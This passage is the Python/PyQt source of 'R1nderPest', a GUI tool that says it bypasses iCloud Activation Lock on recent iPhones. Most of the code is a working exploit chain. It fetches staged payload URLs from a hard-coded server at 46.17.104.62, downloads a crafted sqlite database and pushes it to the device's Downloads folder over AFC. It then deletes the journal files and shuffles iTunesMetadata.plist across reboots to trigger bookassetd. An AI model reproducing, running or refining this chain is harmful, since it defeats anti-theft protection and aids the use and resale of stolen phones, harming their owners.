            if "--only-find-guid" in sys.argv[1]:
                self.listWidget.addItem("[*] --only-find-guid argument detected! Proceeding without activating...")
                onlyFindGuid = True
                self.guid = self.get_guid_auto()
            else:
                try:
                    self.guid = sys.argv[1]
                    self.listWidget.addItem(f"[*] Detected custom GUID!")
                    self.listWidget.addItem(f"[*] Using GUID: {sys.argv[1]}")
                    onlyFindGuid = False
                except:
                    onlyFindGuid = False
                    self.guid = self.get_guid_auto()
        except Exception as e:
            self.guid = self.get_guid_auto()

        self.listWidget.addItem(f"[*] GUID: {self.guid}")

        self.global_GUID = self.guid

        if not self.guid:
            self.listWidget.addItem("[*] Could not get GUID! ")

            
        
            self.listWidget.addItem("[*] What should I do now? \n\n1. Charge the device and DO NOT TOUCH IT for 1-2 days, then reboot it and try again.")
            QtWidgets.QApplication.processEvents()
            sys.exit()
            

        if onlyFindGuid:
            sys.exit()
        self.setProgress(progress=20)

        self.ShowLoadingPopup(message="Checking server availability...")

        time.sleep(0.5)

        r = requests.get(url=f"{self.api_url}?prd=iPhone13,4&sn=SN&guid=GUID&ver=26.1")

        time.sleep(0.5)
        self.HideLoadingPopup()
        time.sleep(0.2)
        if "success': True" in str(r.json()):
            pass
        else:
            self.ShowInfoPopup(button_text="Close", message="Server is not available!", title="Status")
            self.listWidget.addItem("[*] There is no connection to the server! The server may not be available in your country.")
            sys.exit()

        self.listWidget.addItem("[*] Requesting payload...")
        QtWidgets.QApplication.processEvents()



        prd = output.split("ProductType: ")[1].split("\n")[0]
        sn = output.split("SerialNumber: ")[1].split("\n")[0]


        stage1_url, stage2_url, stage3_url = self.get_all_urls_from_server(prd, self.guid, sn)

        if not stage1_url or not stage2_url or not stage3_url:
            self.listWidget.addItem("[*] Failed to get URLs from server!")
            QtWidgets.QApplication.processEvents()
            sys.exit(1)
        
        

        self.setProgress(progress=30)

        self.listWidget.addItem("[*] Pre-loading payload...")
        QtWidgets.QApplication.processEvents()

        stages = [
            ("stage1", stage1_url),
            ("stage2", stage2_url), 
            ("stage3", stage3_url)
        ]
        
        for stage_name, stage_url in stages:
            self.preload_stage(stage_name, stage_url)
            time.sleep(1)

        self.setProgress(progress=50)


        self.listWidget.addItem("[*] Downloading files...")
        QtWidgets.QApplication.processEvents()
        local_db = "downloads.28.sqlitedb"
        if os.path.exists(local_db):
            os.remove(local_db)
        

        if not self._curl_download(stage3_url, local_db):
            self.listWidget.addItem("[*] Failed to download payload!")
            QtWidgets.QApplication.processEvents()
            sys.exit(1)

        self.setProgress(progress=55)

        self.listWidget.addItem("[*] Validating downloaded files...")

        conn = sqlite3.connect(local_db)
        try:
            res = conn.execute("SELECT count(*) FROM sqlite_master WHERE type='table' AND name='asset'")
            if res.fetchone()[0] == 0:
                raise Exception("Invalid DB - no asset table found")
            
            res = conn.execute("SELECT COUNT(*) FROM asset")
            count = res.fetchone()[0]
            if count == 0:
                raise Exception("Invalid DB - no records in asset table")
                
            self.listWidget.addItem("[*] Database validated.")
            
            res = conn.execute("SELECT pid, url, local_path FROM asset")
            for row in res.fetchall():
                self.listWidget.addItem(f"[*] Please wait...")
                
        except Exception as e:
            self.listWidget.addItem("[*] Invalid database!")
            QtWidgets.QApplication.processEvents()
            sys.exit(1)
        finally:
            conn.close()

        self.setProgress(progress=65)

        self.listWidget.addItem("[*] Uploading payload...")
        QtWidgets.QApplication.processEvents()


        target = "/Downloads/downloads.28.sqlitedb"
        
        if self.afc_mode == "ifuse":
            if not self.mount_afc():
                
                
                self.afc_mode = f"C:/R1nderPest/dependencies/pymobiledevice3.exe"
        
        if self.afc_mode == "ifuse":
            fpath = self.mount_point + target
            if os.path.exists(fpath):
                os.remove(fpath)
            shutil.copy(local_db, fpath)
            self.listWidget.addItem("[*] Uploaded!")
            
        else:
            self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "rm", target])
            code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "push", local_db, target])
            if code != 0:
                self.listWidget.addItem("[*] Error while uploading!")
                QtWidgets.QApplication.processEvents()
                sys.exit(1)
            self.listWidget.addItem("[*] Uploaded!")
            
        self.listWidget.addItem("[*] Payload successfully deployed!")


        self.setProgress(progress=75)


        self.listWidget.addItem("[*] Cleaning up files!")
        QtWidgets.QApplication.processEvents()
        
        for wal_file in ["/Downloads/downloads.28.sqlitedb-wal", "/Downloads/downloads.28.sqlitedb-shm"]:
            if self.afc_mode == "ifuse":
                fpath = self.mount_point + wal_file
                if os.path.exists(fpath):
                    try:
                        os.remove(fpath)
                    except Exception as e:
                        self.listWidget.addItem("[*] Failed to remove!")
            else:
                code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "rm", wal_file])
                if code == 0:
                    self.listWidget.addItem("[*] Removed files!")
                else:
                    if "ENOENT" not in err and "No such file" not in err:
                        self.listWidget.addItem("[*] Error while removing files. Skipping...")
                    else:
                        self.listWidget.addItem(f"[*] {wal_file} not present!")

        self.setProgress(progress=80)


        self.listWidget.addItem("[*] Rebooting device...")
        QtWidgets.QApplication.processEvents()
        if not self.reboot_device():
            self.listWidget.addItem("[*] Reboot failed! Skipping...")

        self.listWidget.addItem("[*] Waiting 30s for iTunesMetadata.plist...")

        QtWidgets.QApplication.processEvents()
        for _ in range(20):  # 6 × 20s = 120s = 2 min
            time.sleep(5)

        src = "/iTunes_Control/iTunes/iTunesMetadata.plist"
        dst_books = "/Books/iTunesMetadata.plist"

        def afc_copy(src_path, dst_path):
            try:
                if self.afc_mode == "ifuse":
                    if not self.mount_afc():
                        raise RuntimeError("ifuse remount failed")
                    src_local = self.mount_point + src_path
                    dst_local = self.mount_point + dst_path
                    if not os.path.exists(src_local) or os.path.getsize(src_local) == 0:
                        return False
                    os.makedirs(os.path.dirname(dst_local), exist_ok=True)
                    shutil.copy2(src_local, dst_local)
                    return True
                else:
                    tmp = "temp_plist_copy.plist"
                    code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "pull", src_path, tmp])
                    if code != 0 or not os.path.exists(tmp) or os.path.getsize(tmp) == 0:
                        if os.path.exists(tmp):
                            os.remove(tmp)
                        return False
                    code2, _, err2 = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "push", tmp, dst_path])
                    os.remove(tmp)
                    return code2 == 0
            except Exception:
                return False

        # Copy → /Books/
        
        self.listWidget.addItem("[*] Copying files...")
        if afc_copy(src, dst_books):
            self.listWidget.addItem("[*] Successfully copied!")
            self.setProgress(progress=89)
            QtWidgets.QApplication.processEvents()
        else:
            
            self.listWidget.addItem("[*] iTunesMetadata.plist not found!")
            self.listWidget.addItem("[*] Error while activating your device!")

            sys.exit()

        self.listWidget.addItem("[*] Rebooting...")
        if not self.reboot_device():
            self.listWidget.addItem("[*] Reboot failed! Skipping...")


        QtWidgets.QApplication.processEvents()

        self.setProgress(progress=90)

        # Copy back: /Books/ → /iTunes_Control/iTunes/
        self.listWidget.addItem("[*] Copying files...")
        if afc_copy(dst_books, src):

            self.listWidget.addItem("[*] Successfully copied files!")
        else:

            self.listWidget.addItem("[*] Failed to copy files!")
            
        self.listWidget.addItem("[*] Waiting 15s for bookassetd...")

        QtWidgets.QApplication.processEvents()
        self.setProgress(progress=96)
        time.sleep(40)


        self.listWidget.addItem("[*] Rebooting...")
        self.reboot_device()


        QtWidgets.QApplication.processEvents()
        self.setProgress(progress=100)
        time.sleep(4)
        self.listWidget.addItem("[*] Done! Activate your device as usual.")

        self.ShowInfoPopup(button_text="Close", message="Activate your device as usual.", title="Done!")

        QtWidgets.QApplication.processEvents()

        self.activateButton.setEnabled(False)

        QtWidgets.QApplication.processEvents()

        

            

    def ClosePopup(self):
        self.InfoNotification.hide()

    def ShowInfoPopup(self, button_text: str, message: str, title: str):
        self.InfoNotification.show()
        self.messageTitle.setText(title)
        self.messageContent.setText(message)
        self.closePopup.setText(button_text)

    def MoveBarThread(self):
          moveBarThread = threading.Thread(target=self.MoveBar)
          moveBarThread.start()

    def setProgress(self, progress: float):
        pbWIDTH = self.progressFrame.width()

        newWidth = round(progress * 7.21)

        while pbWIDTH != newWidth:
            time.sleep(0.004)
            pbWIDTH += 1
            self.progressFrame.setGeometry(0,0, pbWIDTH, 51)

    def MoveBar(self):
          global animation
          while animation:
                if self.pb1.x() != 280:
                      barPositionX = self.pb1.x()
                      time.sleep(0.03)
                      barPositionX += 5
                      self.pb1.setGeometry(barPositionX, 0, 31, 21)
                      QtWidgets.QApplication.processEvents()
                else:
                      while self.pb1.x() != 0:
                            barPositionX = self.pb1.x()
                            time.sleep(0.03)
                            barPositionX -= 5
                            self.pb1.setGeometry(barPositionX, 0, 31, 21)
                            QtWidgets.QApplication.processEvents()

    def SearchingForDevices(self):

        while True:
                global version

                time.sleep(1)

                process = subprocess.Popen(
                        ['C:/R1nderpest/libimobiledevice/ideviceinfo.exe'],
                        stdout=subprocess.PIPE,
                        stderr=subprocess.STDOUT,
                        stdin=subprocess.PIPE,
                        text=True,
                        bufsize=1
                )

                output = str(process.stdout.read())

                process.terminate()


                if "ERROR: No device found!" in output:
                        self.introStatusLabel.setText("Searching for devices...")
                else:
                        self.introStatusLabel.setText("Device connected!")
                        self.listWidget.addItem("[*] Device connected!")
                        try:
                                ProductVersion = output.split("ProductVersion: ")[1].split("\n")[0]
                                ProductType = output.split("ProductType: ")[1].split("\n")[0]
                                UDID = output.split("UniqueDeviceID: ")[1].split("\n")[0]
                                DeviceName = output.split("DeviceName: ")[1].split("\n")[0]
                                ActivationState = output.split("ActivationState: ")[1].split("\n")[0]

                                self.iOS = f"{ProductVersion}"
                                
                                self.deviceName.setText(DeviceName)
                                
                                
                                self.deviceUDID.setText(f"UDID: {UDID}")
                                if ActivationState == "Activated":
                                      self.activationState.setText(f"Activation state: Yes")
                                      #self.activateButton.setEnabled(False)
                                      self.activateButton.setText("Unlocked")
                                      self.listWidget.addItem("[*] Your device is already activated!")
                                      self.activateButton.setStyleSheet("""
                                      background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(7, 144, 0, 255), stop:1 rgba(137, 255, 101, 255));
                                      color: rgb(255, 255, 255);
                                      border-radius: 20px;    
                                      """)
                                else:
                                      self.activationState.setText(f"Activation state: No")
                                self.iOSVersion.setText(f"iOS Version: {ProductVersion}")
                        except:
                                self.listWidget.addItem("[*] Could not get device info!")
                                self.introStatusLabel.setText("Could not get device info!")
                                time.sleep(2)
                                sys.exit()
                        time.sleep(0.5)
                        self.introStatusLabel.setText("Checking for updates...")
                        self.listWidget.addItem("[*] Checking for updates...")
                        time.sleep(1)
                        try:
                                r = requests.get(url="https://r1nderpest-default-rtdb.firebaseio.com/.json")
                                serverVERSION = r.json()["version"]
                                if serverVERSION > version:
                                        print(f"[*] Update available! [v{version} ==> v{serverVERSION}]")

                                        self.listWidget.addItem(f"[*] Update available! [v{version} ==> v{serverVERSION}]")
                                        
                                        self.HomePage.show()
                                        self.Intro.hide()
                                        self.ShowInfoPopup(title="Update Available!", message=f"The new version of R1nderPest {serverVERSION} is available!", button_text="Okay")
                                else:
                                        self.HomePage.show()
                                        self.Intro.hide()
                                        
                                        print("[*] No updates found!")
                                        self.listWidget.addItem("[*] No updates found!")
                        except Exception as e:
                                self.HomePage.show()
                                self.Intro.hide()
                                print(f"[*] Error checking for updates! {e}")
                                self.ShowInfoPopup(button_text="Close", message="Error checking for updates!", title="Warning")
                                self.listWidget.addItem("[*] Error checking for updates!")
                        self.listWidget.addItem("#### WARNING! ####")
                        self.listWidget.addItem("Before activating, make sure that the device is connected to the SAME WI-FI NETWORK as the computer, and is also on the activation lock screen")
                        self.Intro.hide()
                        self.HomePage.show()
                        self.api_url = "http://46.17.104.62:8001//get2.php"
                        self.ShowLoadingPopup(message="Checking compatibility...")
                        time.sleep(0.5)
                        self.HideLoadingPopup()
                        time.sleep(0.2)
                        
                        r = requests.get(url=f"{self.api_url}?prd={ProductType}&guid=GUID&sn=SN&ver={self.iOS}")
                        if "'success': True" in str(r.json()):
                            self.deviceInfo.setText(f"iOS Version: {ProductVersion}, Supported")
                            self.ShowInfoPopup(button_text="Close", message="Your device is supported!", title="Status")
                        else:
                            self.deviceInfo.setText(f"iOS Version: {ProductVersion}, Unsupported")
                            self.activateButton.setEnabled(False)
                            self.activateButton.setText("Unsupported.")
                            self.ShowInfoPopup(button_text="Close", message="Your device is unsupported!", title="Status")
                        break



    def retranslateUi(self, MainWindow):
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "R1nderPest"))
        self.welcomeTitle.setText(_translate("MainWindow", "Welcome to R1nderpest!"))
        self.welcomeMessage.setText(_translate("MainWindow", "Welcome to R1nderPest! This tool will help you bypass iCloud on iPhone Xr - 16 Pro Max. To get started, connect your device."))
        self.introStatusLabel.setText(_translate("MainWindow", "Searching for devices..."))
        self.deviceName.setText(_translate("MainWindow", "Device Name"))
        self.deviceInfo.setText(_translate("MainWindow", "iOS Version: 26.1, Supported"))
        self.activateButton.setText(_translate("MainWindow", "Unlock"))
        self.deviceUDID.setText(_translate("MainWindow", "UDID: "))
        self.activationState.setText(_translate("MainWindow", "Activation state: No"))
        self.iOSVersion.setText(_translate("MainWindow", "iOS Version: 26.1"))
        self.messageTitle.setText(_translate("MainWindow", "Message Title"))
        self.messageContent.setText(_translate("MainWindow", "Message content"))
        self.closePopup.setText(_translate("MainWindow", "Close"))
        self.loadingText.setText(_translate("MainWindow", "Connecting to server..."))


if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()
    sys.exit(app.exec_())
